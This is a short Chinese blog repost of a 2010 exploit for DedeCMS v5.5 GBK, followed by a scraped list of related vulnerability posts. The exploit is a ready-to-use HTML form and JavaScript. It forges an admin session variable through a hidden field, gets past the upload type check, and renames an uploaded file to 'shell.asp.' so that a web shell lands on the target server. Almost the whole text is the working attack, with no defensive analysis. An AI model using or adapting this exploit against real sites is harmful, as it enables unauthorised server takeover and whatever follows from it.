DEDECMS v5.5 GBK Final 的一个鸡肋漏洞
即可绕过检查上传shell
U R L:<input type="text" name="target" size="50" value="http://192.168.1.110">
Path:<input type="text" name="path" value="/DedeCmsV55-GBK-Final/uploads/include/dialog/select_soft_post.php" size="90"><br>
File: <input type='file' name='uploadfile' size='25' />(Filetype must be GIF/JPEG etc)
RenameTo:<input type='test' name='newname' value="shell.asp."/><br>
<input type=hidden name="_SESSION[dede_admin_id]" value=1>
<input type=hidden name="bkurl" value=1>
<input type='button' value='submit' οnclick="fsubmit()"/><br><br><br><br><br><br>
dedecms 0day exp..<br>
need: session.auto_start = 1<br>
By toby57 2010/2/22
</form>
<script>
function fsubmit(){
var form = document.forms[0];
form.action = form.target.value + form.path.value;
tmpstr = form.target.value +'/'+ form.newname.value;
form.bkurl.value = tmpstr.substr(0,tmpstr.length-1);
form.submit();
}
</script>
转载于:https://blog.51cto.com/jiedushi/281734
DEDECMS v5.5 GBK Final 的一个鸡肋漏洞相关推荐
- php中%3c w() %3e,DedeCMS V5.7 SP2后台存在代码执行漏洞
原标题:DedeCMS V5.7 SP2后台存在代码执行漏洞 *本文原创作者:风炫520,本文属FreeBuf原创奖励计划,未经许可禁止转载 简介 织梦内容管理系统(DedeCms)是一款PHP开源网 ...
- php平台下的dedecms,网上最流行的php网站管理系统 DedeCMS V5.5 gbk 正式版正式发布(Build-0309)...
DedeCMS V5.5增强或修正功能列表 一.已经修正的BUG: 1.添加后台系统管理员账号,无法删除会员列表的账号: 2.这篇文档需要注册会员才能访问,你目前是:注册会员(提示文字不正确): 3. ...
- DedeCMS V5.7 前台任意用户密码修改漏洞
本博客已搬迁至:https://n0puple.github.io/ 此处不再更新文章 本文仅用于技术讨论与研究,文中的实现方法切勿应用在任何违法场景.如因涉嫌违法造成的一切不良影响,本文作者概不负责 ...
- 织梦支持html5吗,自动更新HTML FOR DedeCMS V5.3(支持首页,列表页,文章页)
关键字描述:支持 首页 文章 更新 自动 DedeCMS 模块 安装 DedeCMS V5.3的使用方法很简单~~~ 直接用后台的模块安装就可以了.坚决贯彻实施官方的插件模块化,一键安装的理念. 当然 ...
- 织梦cms5.7搭配php哪个版本,DedeCMS V5.5正式版正式发布(Build-0912)
文件类型:.zip 软件大小:4.2MB 下载次数: 软件类别:国产软件 软件语言:简体中文 授权方式:共享软件 运行环境:PHP4.x.5.x + MySQL4.x.5.x 更新时间:2009-09 ...
- DeDeCMS v5.7 SP2 前台任意用户密码修改漏洞复现
DeDeCMS v5.7 SP2 前台任意用户密码修改漏洞复现 一.漏洞概述 1.简介 织梦内容管理系统(DedeCms) [1] 以简单.实用.开源而闻名,是国内最知名的 PHP 开源网站管理系统, ...
- DeDeCMS v5.7 SP2 正式版 前台任意用户密码修改漏洞复现
文章目录 简介 漏洞限制 影响版本 复现环境 工具准备 一.搭建网站 二.打开服务器代理 三.复现过程 注意 简介 织梦内容管理系统(DedeCms) [1] 以简单.实用.开源而闻名,是国内 最知名 ...
- xamarin其实也是一个鸡肋
刚刚体验了一把VS 2015,后来因为部分sdk和工具下载太慢,还是最终决定卸载.顺道了解了下xamarin studio.个人感觉Xamarin完全也是一个鸡肋,没必要过多的时间在xamarin上面 ...
- dedecms v5.7 sp2代码执行漏洞复现
环境搭建 DeDeCMS官网:http://www.dedecms.com 网站源码版本:DedeCMS V5.7 SP2正式版 程序源码下载:http://www.dedecms.com/produ ...
最新文章
- Python之装饰器
- pcm 转化为wav 文件
- mysql timestamp 差值_MySQL中TIMESTAMPDIFF和TIMESTAMPADD函数的用法(两个日期之间的差值)...
- java-第七章-数组-循环输出
- CF-196 D.The Next Good String(hash)
- 水晶报表-横向设计页面,设置网格高度
- java.util.concurrent.ExecutorService 接口 源码
- [目录]搭建一个简单的WebGIS应用程序
- Case 2-1:用空间平滑法分析华南地区的TAI语地名分布
- 弹出菜单快捷键的使用方法
- 第二层交换机工作原理
- Spring Aware接口注入
- 【Espruino】NO.18 使用L298N驱动直流电机
- edius裁剪快捷键_EDIUS 快捷键大全 edius常用快捷键大全
- javascript定时器的计时事件
- vue微信内h5页面微信授权登录
- 自己动手写iPhone wap浏览器之界面架构篇
- 电商运营中京东运营法则
- 公司邮箱后缀有哪些?外贸邮箱域名有哪些你知道吗?
- 地统计分析在气象领域的应用